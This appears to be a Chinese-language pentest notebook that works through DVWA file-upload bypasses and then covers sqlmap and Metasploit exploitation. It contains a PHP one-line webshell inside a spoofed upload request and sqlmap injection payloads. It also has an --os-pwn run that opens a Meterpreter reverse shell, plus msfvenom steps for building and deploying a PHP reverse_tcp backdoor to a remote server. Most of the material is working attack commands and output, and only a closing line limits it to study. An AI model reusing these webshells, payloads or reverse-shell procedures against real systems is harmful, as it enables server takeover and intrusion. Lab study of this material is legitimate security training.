low:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
没有对文件类型进行限制,直接将php文件上传,之后访问:http://localhost/hackable/uploads/XX.php即可。
medium:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
对上传的文件进行限制。
解决方法1:用burp suite进行00截断,将文件名改为1.php .jpg(注意中间有空格)然后在拦截中将空格改为00。
解决方法2:直接上传2.php文件之后进行拦截,数据包如下
POST /vulnerabilities/upload/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/vulnerabilities/upload/
Cookie: PHPSESSID=pgke4molj8bath1fmdh7mvt686; security=medium
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------143381619322555
Content-Length: 549
-----------------------------143381619322555
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
-----------------------------143381619322555
Content-Disposition: form-data; name="uploaded"; filename="2.php"
Content-Type: application/octet-stream
<?php
$item['wind'] = 'assert';
$array[] = $item;
$array[0]['wind']($_POST['loveautumn']);
?>
-----------------------------143381619322555
Content-Disposition: form-data; name="Upload"
Upload
-----------------------------143381619322555--
将红色的部分修改成:Content-Type: image/jpeg即可绕过。
High:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
对图片的命名和类型进行了严格的限制,那么可以用文件头欺骗的方式来解决这个问题。另外,假设文件名为1.php.png,strrpos会截取.出现的最后位置是5,之后substr从第六位开始重新命名文件名,也就是最终上传的文件名会被改成png,会被拦截掉。
首先使用记事本对正常图片文件编辑,将php一句话代码写到图片最下面,保存。这样就可以欺骗文件类型的检测。
最后对文件名的重命名进行绕过。将文件名改为1.php .png上传,用burpsuite拦截:
Content-Disposition: form-data; name="uploaded"; filename="1.php .png"部分修改为
Content-Disposition: form-data; name="uploaded"; filename="1.php\X00.php .png"的话可以获得一个x00.php .png文件,这个是之前有php任意文件上传漏洞的文章中提到过的。对空格截断无效。目前不知道最终答案,可能是上传一个含有一句话的jpg文件之后采用文件包含来完成?暂时存疑
nexpose安装在虚拟机中比较麻烦,所以直接安装到物理机上,kali安装在虚拟机中,执行扫描命令如下:
首先确定是否连接数据库:
msf > db_status
[*] postgresql connected to msf3
确认后
msf > load nexpose
连接后
msf > nexpose_connect loveautumn:pass@192.168.1.8:3780 ok----loveautumn是用户名,pass是密码,192.168.1.8是物理机IP
msf > nexpose_scan 192.168.1.8
[*] Scanning 1 addresses with template pentest-audit in sets of 32
自己搭建一个PHP+MYSQL平台,靶场为DVWA,设置SQL注入靶场级别为low(方便测试使用)。
在提交框中输入1,用burp抓包,将包数据复制到cookies.txt文档中,拖到kali环境。
root@kali:~# sqlmap -r "/root/cookies.txt"
返回:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-1890' OR 7466=7466#&Submit=Submit
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: id=-6878' OR 1 GROUP BY CONCAT(0x7162626271,(SELECT (CASE WHEN (5403=5403) THEN 1 ELSE 0 END)),0x716b766271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: id=' AND (SELECT * FROM (SELECT(SLEEP(5)))Dgpu)#&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=' UNION ALL SELECT NULL,CONCAT(0x7162626271,0x4c4266596d5953594265,0x716b766271)#&Submit=Submit
---
[13:45:05] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.29, Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[13:45:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.8'
确定注入点后:
root@kali:~# sqlmap -r "/root/cookies.txt" --os-pwn --msf-path=/opt/metasploit
部分省略
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1(使用metasploit的TCP连接shell)
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4(PHP的脚本)
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2(自定义路径)
please provide a comma separate list of absolute directory paths: D:/WWW/DVWA/(输入绝对路径)
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1(TCP反向连接shell)
what is the local address? [Enter for '192.168.1.104' (detected)]
which local port number do you want to use? [16308]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1(meterpreter shell)
部分省略
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 16308
LHOST => 192.168.1.104
[*] Started reverse handler on 192.168.1.104:16308
[*] Starting the payload handler...
[13:46:43] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[*] Sending stage (957487 bytes) to 192.168.1.8
[*] Meterpreter session 1 opened (192.168.1.104:16308 -> 192.168.1.8:37639) at 2016-01-17 13:46:45 +0800
meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > Computer : PGOS
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/win32
meterpreter > Server username: PGOS\Administrator
meterpreter >
同时,DVWA目录下会生成一个随机的php上传shell。
Metasploit简介
灰帽黑客(第3版) Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户
metasploit框架PHP反向后门建立
msfvenom -l 查看所有payload
Framework Payloads (436 total)
==============================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
其他的省略。
这里要使用的是PHP反向后门
msfvenom -p php/meterpreter/reverse_tcp --payload-options 查看参数
Options for payload/php/meterpreter/reverse_tcp:
Name: PHP Meterpreter, PHP Reverse TCP Stager
Module: payload/php/meterpreter/reverse_tcp
Platform: PHP
Arch: php
Needs Admin: No
Total size: 936
Rank: Normal
Provided by:
egypt <egypt@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Description:
Run a meterpreter server in PHP. Reverse PHP connect back stager
with checks for disabled functions
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=1234 -f raw >c.php 生成脚本
生成后要将脚本最前面的注释符去掉,然后上传到目标服务器上
启动msf
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 1234
exploit 启动监听
然后从浏览器中打开上传的脚本http://xxx.com/c.php
msf中就会看到
*] Starting the payload handler...
[*] Sending stage (33068 bytes) to XXX.XXX.XXX.XXX
[*] Meterpreter session 1 opened (192.168.1.2:1234 -> xxx.xxx.xxx.xxx:42280) at
meterpreter >
如果kali安装在虚拟机上,需要桥接,然后路由器上将kali DMZ到外网
注意:此教程只用于学习使用其它一切后果与本站无前